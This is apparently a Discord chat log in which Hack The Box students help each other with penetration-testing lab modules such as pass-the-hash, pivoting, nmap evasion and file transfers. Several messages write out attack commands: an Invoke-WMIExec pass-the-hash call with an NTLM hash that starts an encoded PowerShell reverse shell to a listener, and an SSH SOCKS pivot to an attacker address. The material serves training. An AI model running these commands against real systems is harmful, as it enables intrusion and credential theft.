At line:1 char:1
+ dir \\10.10.15.145\DavWWWRoot
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.15.145\DavWWWRoot:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Users\htb-student> wget http://10.10.15.145/DavWWWRoot/file.txt -OutFile dav.txt
PS C:\Users\htb-student> type dav.txt
something
MarcieLee is helping you, otherwise if I have time I'll spawn the machine and recreate everything since I did it quite a while ago
This does not work either:
$smbclient -U "" -N -L //127.0.0.1/
do_connect: Connection to 127.0.0.1 failed (Error NT_STATUS_CONNECTION_REFUSED)
$smbclient -U "" -N -p80 -L //127.0.0.1/
Protocol negotiation to server 127.0.0.1 (for a protocol between SMB2_02 and SMB3) failed: NT_STATUS_CONNECTION_DISCONNECTED
I get the same error:
PS C:\Users\htb-student> dir \\10.10.15.145\
dir : Cannot find path '\\10.10.15.145\' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.15.145\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
i just solved this unintendedly via hybrid analysis, anyone mind telling me how im supposed to actually find the function via x64dbg/IDA?
I also tried to accept more versions of the protocol by modifying my /etc/samba/smb.conf file, but I still have the same error:
$smbclient -U "" -N -p80 -L //127.0.0.1/
Protocol negotiation to server 127.0.0.1 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_DISCONNECTED
I generally don't bother with wsgidav ¯_(ツ)_/¯
Other methods are more reliable
Also DavWWWRoot is special as windows should recognize it, but linux doesn't
can someone help me with how to modify the script in the Broken Authentication - Predictable Reset Token - Question 1 module
UTC, +/- 1 second (1000ms on each end)
In total it's 2001 requests, -1 second, current, +1 second
can i dm u for a second
No
Haven't done this module
Just echoing the common thing
Range needs to start before and after "now"
Also time needs to be in ms
You're checking epoch time
120 sounds like you're doing 120 seconds or so
I forget how it works
Also wrap your codeblock in backticks
Hello everyone, stuck on PASSWORD ATTACKS, Pass the Hash (PtH) question : Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
After I connect to a powershell console using Julio's credentials, I run the commands suggested in the lesson and apparently Import-Module is not recognized as a cmdlet and when I run the Invoke-WMIExec command, I get nothing.
Put ```php before and ``` after your code
ok
But 120 is a wide fucking range
Your start_time is only doing (current time - 120 seconds) and the range is only 1+ that
So you're literally not even checking the right parameters
Is that the code given?
Or did you generate that code yourself
given
Ah
Please feel free to DM 🙂
this is the hint: Convert the displayed date to epoch time in milliseconds and use it in the script you will create.
Again, haven't touched the module, so there's likely something simple you're overlooking
Yes
Which is where +/- 1s comes from
Or +/- 1000 ms
In WEB SERVICE & API ATTACKS
SOAPAction Spoofing
upper payload gives 'This function is only allowed in internal networks' but lower payload works why?
ExecuteCommandRequest vs LoginRequest
A command request should be executed by internal networks
Whereas you can login from "outside" to the forward facing service
You invoke the module on the machine you are rdped into.
It's the same as the screenshot
can't do it i hate python
not my problem lol. ¯_(ツ)_/¯
i know bro i am not forcing you into helping xdd i am just saying 
If the expected solver is in py then not much you can do about that
You can basically use any programming language to create the token and send it to the website
Hi, thanks for the answer! So I'm connected via rdp to julio on MS01. I have opened a port using nc.exe on one terminal, and i am launching the command : '.\Invoke-WMIExec -Target DC01 -Username julio -Domain inlanefreight.local -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e ..."' and yet I don't get anything on the nc.exe listener...
Is your b64 revshell correct?
Hello, need a little help please, I think I deleted hashcat by mistake, how could I reinstall it?
Generally sudo apt install hashcat should work
Second: how did you accidentally delete it? Running around as root?
If it gives error, try adding --fix-broken or --fix-missing
Well it's a long story hahahah
sudo apt install hashcat
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
hashcat : Depends: hashcat-data (>= 6.2.6+ds2-1) but 6.2.6+ds1-1 is to be installed
Depends: libminizip1t64 but it is not installable
E: Unable to correct problems, you have held broken packages.
I'd send you a screenshot if I could but it seems discord won't let me. On the website I chose 172.16.1.5, port 9001 and PowerShell #3 (Base64). I don't think there is anything else to select... And I ran nc.exe -lnvp 9001.
hey, got stuck on that one for hours. Try event.created and mess with the customize time interval 😉
Is 172.16.1.5 your ip?
Check with ipconfig /all
And look for the 172.16 interface
Again your reverse needs to be correct alongside the target
I think it is, when I am connected as julio via rdp to MS01 and I run ipconfig /all, I get the ethernet1 2 interface which says that my ipv4 is 172.16.1.5
And your listener is running in another window to be extra sure
Also generally when listening for shells you do lvnp
Not lvp
parallel_read returned NT_STATUS_IO_TIMEOUT how do i solve this ?
Pray for a better connection
But on a serious note: if not already, use tcp vpn. If that doesn't resolve, change vpn region
So yes I just re-did it, I have a powershell window running the nc.exe and a powershell window running the invoke and it still doesn't work
Running linux distros on a phone sucks
you know sometimes powershell just doesn't work
that's when you rely on the good ol classic nc for windows
What I install
I don't have money
did it and still nothing
I have 16 old
Even a half-decent $100 laptop is better than a phone
Ok
do you know if the windows host even has nc?
Most things are designed for laptop/Desktop distros
Yes
There is a folder called C:\tools in which there is a nc.exe executable
can anyone download the file for me please ?
It's in c:/tools
No
and when I run it does what it generally does with nc so I don't think the problem comes from here
I have destroy laptop
damn dude.. if you got your ports forwarded correctly then it should work
what shell are you running nc in
I tried powershell and cmd.exe
Broken Authentication Predictable Reset Token
if anyone did this module and i can DM to help with modifying the script i will appreciate it so much ❤️
anyone already passed Password Attacks Lab - Hard ?
Yes
yea i did
i just need the backup.vhd
The smb file download is one of the semi-final steps
Did you try changing vpn regions?
Here's the full command just to be sure:
PS C:\tools\Invoke-TheHash> .\Invoke-WMIExec -Target DC01 -Username julio -Domain inlanefreight.htb -Hash --hash-- -Command "powershell -e ..."
Resetting target
This command contains a spoiler for the hash of the user
I suggest redacting the hash
At least if you're sharing it
but it's given in the lesson
no: the admin hash is, one of the questions is to obtain Julio's hash
i have tried changing region, reset target, reboot my vm,and change my vpn from udp to tcp like you just said
none of them worked
terminate box -> restart it -> wait like 5 minutes
the issue is that your connection for w/e reason isn't stable
so if you tried multiple vpn regions then it's not HTB
Julio's hash is used in all the examples of the lesson
oh this isn't even a pivoting thing.
nope
Password Attacks - PtH section
if it's an imported module, why are you using .\Invoke-WMIExec
to run a remote command
does that work? the .\
it's even worse when i don't have access to a pc. can't check anything, tired af
yea Powershell Commandlets aren't run with ./
Ok I'll try without then
you import things with import-module C:/path/to/file or ./file.psd1 if in the local directory
WORKED!!! Finally
So the error was using .\ after having imported
very good. .\ is just gonna try to run whatever is in your current dir
For the Server-Side Attacks Module in the SSTI section I could not get the tplmap tool mentioned in the module. I ended up using SSTIMap from github and it worked with the same command line arguments in the example on that module
👍
anyone solved this before
Broken Authentication - Predictable Reset Token - module
Hi guys im on AD skills assessment 1 im stuck on the question "Find cleartext credentials for another domain user. Submit the username as your answer." I just can't get a stable shell on MS01 to run mimikatz.exe on it, I've tried enter-pssession but it's very unstable and im trying to transfer nc64.exe to it with Invoke-Command but i can't, can someone help?
Can’t move files from Bob
C:\> move sam.save \\10.10.15.75\CompData
Access is denied.
0 file(s) moved.
man... sql statements really like their spaces for the comment huh
do you have write access to the fileshare you're hosting?
if you're sharing from a root-protected directory, that can cause problems
i suggest launching the smb share from /tmp/
Hi guys im on AD skills assessment 1 im stuck on the question "Find cleartext credentials for another domain user. Submit the username as your answer." I just can't get a stable shell on MS01 to run mimikatz.exe on it, I've tried enter-pssession but it's very unstable and im trying to transfer nc64.exe to it with Invoke-Command but i can't, can someone help?
try running mimikatz and passing commands to it as `./mimikatz.exe "<command>" "exit"`
the issue is i cant transfer mimikatz to it
Hi guys, i just finished "Firewall and IDS/IPS Evasion - Hard Lab"
i was really close to giving up and quitting the whole job path until i found the solution. BUT i have no idea how i should get the solution with enumeration.. also, i did not understand the question correctly.. i thought "the service" was still referring to the dns.. am i stupid? and can somebody maybe explain to me in pm how i should enumerate this port correctly?
ah; i believe you get a user/pass from the first questions yeah?
yeah
ive enter-pssession to it
dns is a part of it
but it just doesnt want to download anything
see where you have to use the --source-port
are you using the provided upload functionality of the webshell?
ive transferred everything through the webshell, all the tools, but im trying to download the files on the webshell to ms01
i know what's DNS' part of it, but i didn't get the port i have to target in my first enumeration.. i found it by accident.. so i have to work on my port scanning skills, so i would like to know where i failed 🙂 i used nmap with -F
port 53 is the DNS port
if you read the IDS/IPS evasion section again, specifically where it talks about using a source port, it will illuminate more
ohhh so i can use -F with --source-port?
without setting source port (so allowing your system to designate port > 1023) the server treats the request as a random scrape and denies access
i don't recommend -F if you're trying to be evasive
also -F could miss ports that take a minute to respond
-T4 is the safest most aggressive timing option
but i had no hint for the port i was looking for... should i make port lists on my own?
-F only scans the top 100 COMMON ports
-p- scans all ports
you're gonna miss the right port if you don't properly enumerate
ohh i get it, so using -p- with -T4 is safer with more ports detected
yes
-T4 sets a bunch of timing options
while -F says it's the "Fast option" it's Fast because it's ONLY scanning 100 ports
Hi guys
whereas the port required for the answer is outside the top 100 port range
(and requires some other techniques to find)
yea i understood that, but i tested with t1 (i think) and it lasted hours.. so i was thinking, that this couldn't be correct
t1 is the slowest timing
t0 would be actually
literally slower than just running nmap without any timing options
well yes but you get the point
yea, thank you so much for the clarification.. i am sometimes a bit lost doing cpts without a pentesting background
i don't have a pentesting background either
i just RTFM and go
like i'm breezing through some modules where a handful of people got "stuck" and literally, my only slight problem was a missed syntax or character in payload
¯_(ツ)_/¯
Yo marcie lee can you just help me out on how to transfer a file from the webshell to ms01 with powershell would be much appreciated.
i.e. many people get stuck on the "bruteforcing" module... i found it mostly trivial... at least from the perspective of just doing what it says
many ways to transfer files ¯_(ツ)_/¯
yea but if you say t4 is correct and the lesson says t3 is default, then i don't get the evasion part if i scan even faster ^^
can you give me an example
you can host a python http server and from the webshell iwr http://your_ip:port/file -OutFile <filename>
you can read up on the file transfers module that was way early in the pentester path if you're following that
Yeah but that's a different case, it's the webshell to the MS01, a separate windows machine on the 172 subnet
I need to re-set up my nginx hack filehosting server for it
not from linux to webshell ive done that
oh
depending on how you have access to MS01; you can mount a drive with xfreerdp
/drive:
ssh uses scp
scp source destination
i finished all the Broken Authentication module except this part Predictable Reset Token
i only have a set of credentials to access ms01 but only through enter-pssession and it's very non functional so im trying to somehow get nc64.exe on ms01 and then connect to it from the webshell
You will get through it friend. Don't give up. We all get stuck
you did it ?
why not upload and use a pivot on the webshell? so you can access the full network without being limited to the back-asswards webshell
not yet doing the web attacks module atm
yup me too i will start it now W teemo player BTW
there's some like ligolo that's just set up and go
i dont get what u mean by pivot on the webshell, like ive already downloaded a revshell on the webshell so i can get a shell on my linux machine but i dont get what u mean by pivot
i mean a tool that acts as a bridge between the internal network and your system; see the Pivoting module for more info
though the most popular tool currently, isn't discussed in it
ah ok
so instead of having some revshell you can just either ping the internal network directly or via proxychains socks 4/5
are you doing the pentester path?
or just decided to pick up AD Enum
ur right but how am i gonna be able to download a file from my linux machine from ms01 since i cant download any tool onto ms01 to create a tunnel between the ms01 and webshell
AD Enum & attacks assumes some level of understanding of pivoting
yeah no ive done it
🤦
ok
let me be more clear
you don't need to bridge between ms01 and webshell
as they're connected
once you are running a pivot on the web01 host; you can connect directly to ms01
so any direct tool like xfreerdp or ssh will be viable
evil-winrm would likely be the viable option to connect to a ps session on MS01; and it has an upload/download functionality
MarcieLee why you not doing any of the exams. You seem pretty knowledgable?
bypassing the need to double hop your tools
i've not passed the path 
alr thanks lemme try something
Ah ok you just cba or?
took like a few weeks off for mental health and catching up on uni work
spent 4 hours yesterday doing the web ones between AD enum and SQLi intro module
some of that time was literally I FORGOT TO SELECT Y ON AN OPTION IN CUPP
intro to whitebox pentesting / help :
i did this command : "curl -s -X POST -H "Content-Type: application/json" -d '{"email": "test@test.com"}' http://localhost:5000/api/auth/authenticate"
it generates me a token but the token doesn't work
i tried with this command : curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer <token>" -d '{"text": "this is a test"}' http://localhost:5000/api/service/generate
oh as a heads up you don't need to copy over all the mimikatz files for mimikatz to run, the binary works fine by itself
the other stuff is just additional helpers
bro im trying to create the webshell as a pivot but it just doesnt work C:\windows\system32\inetsrv>.\plink.exe -ssh -D 9050 kali@10.10.14.55
.\plink.exe -ssh -D 9050 kali@10.10.14.55
FATAL ERROR: Network error: Connection timed out
C:\windows\system32\inetsrv>
brother
use the existing webshell to drop the pivot on
also is ssh running on your kali
yes
really dont get what u mean
but there's a bunch of other tools to use
i use ligolo, personally, as it's much nicer framework and setup
alr
.
can someone help me pls
now you can use evil-winrm's upload/download functionality to upload/download :D
yup thanks so much
Hello everyone, does anyone know about the approximate dates of the DACL Attacks module extension and is there any information about future Expert certifications from HTB related to Active Directory?
with the advent of the Senior Web Pentester path; and the pattern of previous certs (CBBH, CPTS CDSA) it can be assumed that an advanced Pentest cert may be in the works, potentially CPTE or something along those lines. (I beg of you Apollo, do not provide me the dodgeball of prophecy)
especially considering that there's already a handful of advanced AD related modules
CPTE what a bad name
¯_(ツ)_/¯
I can't think of an apt 4 letter acronym
since most start with C
C___
it's CPEE
APTS
again i'm just going off HTB's current track record of Cert Naming
Certified [field]
so CAPTS
It sounds like an Advanced Persistent Threat Specialist 🙂
So good
Hey sorry. Had important things to do. If you're still stuck feel free to dm me the steps
that's name of CERT on your resume . will got you a job
No I'm good I solved it thanks!
sorry for disappearing. Something came up. Ok good to hear
because the the agent doesnt have 2 interfaces
guys most of us haven't even mastered the current certs and we asking for expert certs 😂
how many have passed the CPTS and CBBH for example
take it as a motivation
finished the both paths , but didn't take exams
same
Nice I am 80% through CBBH
I don't think it's possible to do an AD certification for beginners
I don't find AD to be too difficult but it's also because I have a sysadmin background, I can see it being overwhelming for newbies
Although I haven't done the AD modules yet
Just going from what I learned in the PNPT
drop the S maybe?
Certified Advanced Persistent Threat
as that's more of a classification than a type of job
a lot of the bits of AD enum take advantage of Domain Users and misconfigured ACLs like GenericWrite, ForceChangeUserPassword and such
i.e. a random user being able to change an admin's password 
isn't most AD pentesting taking advantage of misconfigurations?
yes
but it also shows how you can get the info from built-in tooling AND more optimized tools
Pro I want to learn hacking but I have phone🤣
Hi everyone, I'm asking for help because in the module attacking the common services (SQL DATABASE) I can't connect using the htbduser credentials and pass MSSQLAccess01! with none of the recommended tools, I've been stuck for hours. Thank you
htbdbuser <-- make sure you type the username correctly
and if you're typing the PW in plaintext in your connection -- wrap it in singlequotes
I can't believe it, after three days it finally worked, I managed to get the hash with responder 😂 thanks
i told you this when you asked last time
lmao you just missed it

#cpts message for reference :3
again - it tripped me up too
sorry
